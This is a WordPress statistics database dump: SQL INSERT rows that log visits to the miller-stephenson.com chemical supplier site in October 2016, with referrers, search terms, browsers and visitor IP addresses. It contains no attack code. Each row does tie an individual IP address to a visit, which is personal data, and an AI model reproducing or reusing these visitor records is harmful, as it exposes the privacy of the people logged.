INSERT INTO `wp_statistics_visitor` VALUES (9872, '2016-10-21', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '192.227.204.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9873, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CFMQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=GYIKWPrcGtqw9wLVGg&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Safari', 'iPhone', '7.0', '', '66.102.6.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9874, '2016-10-21', 'https://www.miller-stephenson.com', 'solfo-linkchecker', 'Unknown', '1.0', '', '199.15.176.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9875, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9876, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9877, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.103', '', '174.78.176.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9878, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '96.58.73.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9879, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9880, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9881, '2016-10-21', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '77.170.7.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9882, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.97.226.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9883, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.94.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9884, '2016-10-21', 'https://www.google.com/', 'Chrome', 'iPhone', '53.0.2785.109', '', '128.54.51.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9885, '2016-10-21', 'https://www.google.fr/', 'Safari', 'iPhone', '9.0', '', '37.174.67.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9886, '2016-10-21', 'https://www.miller-stephenson.com/miller/krytox.html', 'MSIE', 'Windows', '9.0', '', '182.118.22.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9887, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.57.97.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9888, '2016-10-21', 'https://centurylink.net/search/index.php?q=miller%27s+chemicals&context=homepage', 'MSIE', 'Windows', '11.0', '', '184.4.199.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9889, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.83.139.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9890, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.98.90.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9891, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.190.102.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9892, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.75.212.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9893, '2016-10-21', 'https://www.bing.com/search?q=epikure+w&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9894, '2016-10-21', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epikure-curing-agents/epikure-w-composites/', 'MSIE', 'Windows', '9.0', '', '204.79.180.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9895, '2016-10-21', 'https://www.miller-stephenson.com', 'VidibleScraper', 'Unknown', '1.0', '', '52.1.31.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9896, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '47.0.2526.83', '', '174.209.26.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9897, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '108.192.89.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9898, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9899, '2016-10-21', 'https://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9900, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.75.194.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9901, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.133.124.181', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9902, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.202.115.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9903, '2016-10-21', 'https://www.google.com/search?client=safari&rls=en&q=krytox+grease&ie=UTF-8&oe=UTF-8', 'Safari', 'Macintosh', '5.0.6', '', '70.215.197.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9904, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.186.183.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9905, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9906, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.158.209.193', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9907, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9908, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9909, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.162.160.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9910, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.101.168.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9911, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.200.154.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9912, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9913, '2016-10-22', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '76.183.136.234', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9914, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '80.255.42.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9915, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.194.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9916, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.241.100.243', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9917, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.97', '', '52.207.61.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9918, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.186.183.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9919, '2016-10-22', 'https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/', 'Safari', 'iPhone', '7.0', '', '65.55.210.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9920, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '76.115.186.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9921, '2016-10-22', 'https://www.miller-stephenson.com/products/?DepartmentId=5', 'MSIE', 'Windows', '9.0', '', '182.118.21.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9922, '2016-10-22', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '8.0.2', '', '107.150.87.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9923, '2016-10-22', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.150.87.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9924, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9925, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.143.128.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9926, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.200.226.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9927, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '129.176.151.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9928, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9929, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.186.232.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9930, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9931, '2016-10-22', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '8.0.2', '', '188.208.1.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9932, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '45.55.185.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9933, '2016-10-22', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9934, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.250.6.128', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9935, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.190.105.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9936, '2016-10-22', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '37.6.183.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9937, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.103.183.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9938, '2016-10-22', 'https://www.bing.com/search?q=epon+solid+epoxy+resin&qs=SC&pq=eporn+sool&sc=1-10&sp=1&cvid=DE0305F2867D4EEBA2873C7C82100B04&FORM=QBRE', 'Android Browser', 'Android', '4.0', '', '47.9.152.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9939, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.113.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9940, '2016-10-22', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '59.182.177.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9941, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '46.98.161.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9942, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '64.150.222.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9943, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9944, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9945, '2016-10-22', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9946, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '104.239.198.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9947, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.77.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9948, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.135.238.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9949, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.200.12.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9950, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9951, '2016-10-22', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9952, '2016-10-22', 'https://www.google.ca/', 'Safari', 'iPad', '9.0', '', '172.218.12.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9953, '2016-10-22', 'https://www.miller-stephenson.com', 'Drupal', 'Unknown', 'Unknown', '', '104.130.221.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9954, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '104.34.0.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9955, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.75.194.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9956, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '85.93.91.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9957, '2016-10-22', 'https://www.google.co.th/', 'Chrome', 'Windows', '54.0.2840.59', '', '183.89.150.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9958, '2016-10-22', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.95', '', '107.183.37.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9959, '2016-10-22', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.183.37.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9960, '2016-10-22', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '107.183.37.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9961, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.165.233.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9962, '2016-10-22', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '103.12.195.133', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9963, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9964, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9965, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9966, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9967, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.3.32.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9968, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '145.255.21.134', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9969, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9970, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.242.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9971, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '42.0.2311.152', '', '40.77.163.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9972, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.23.176.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9973, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9974, '2016-10-22', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '48.0.2564.97', '', '37.115.199.39', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9975, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '76.14.73.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9976, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.200.101.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9977, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.66.201.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9978, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.1.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9979, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '45.114.88.130', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9980, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.95.186.116', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9981, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.170.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9982, '2016-10-22', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9983, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.92.25.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9984, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9985, '2016-10-22', 'https://forums.pelicanparts.com/911-engine-rebuilding-forum/284737-complete-engine-sealant-thread-16.html', 'Chrome', 'Chrome OS', '53.0.2785.154', '', '174.113.182.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9986, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.18.120.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9987, '2016-10-22', 'https://life-instyle.com/', 'Opera', 'Windows', '8.01', '', '178.137.167.230', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9988, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9989, '2016-10-22', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '8.0.2', '', '104.223.30.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9990, '2016-10-22', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.223.30.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9991, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.2.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9992, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.252.76.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9993, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.3.68.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9994, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.137.104.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9995, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.113.108.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9996, '2016-10-22', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '103.57.242.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9997, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '195.154.102.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9998, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '172.245.169.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9999, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.88.17.192', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10000, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.69.233.197', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10001, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.139.151.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10002, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.149.47.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10003, '2016-10-22', 'https://www.directindustry.com/prod/miller-stephenson-chemical-co/product-173822-1749320.html', 'Chrome', 'Windows', '53.0.2785.143', '', '45.116.47.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10004, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.18.226.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10005, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '180.241.37.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10006, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.244.194.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10007, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10008, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10009, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10010, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.22.178.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10011, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.127.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10012, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.17.0.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10013, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '9.0', '', '199.185.0.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10014, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10015, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.100.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10016, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.46.192.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10017, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '104.236.31.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10018, '2016-10-22', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=46&print=y', 'MSIE', 'Windows', '9.0', '', '182.118.20.215', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10019, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.163.9.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10020, '2016-10-22', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '142.91.81.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10021, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.17', '', '83.166.243.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10022, '2016-10-22', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '106.51.64.152', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10023, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.45.36.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10024, '2016-10-22', 'https://www.mschem.com/miller/buscador.php?palabra=sha+005t&buscador=+', 'Chrome', 'Windows', '49.0.2623.112', '', '2.184.61.152', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10025, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.107.249.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10026, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.188.126.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10027, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.116', '000', 2, 0); 
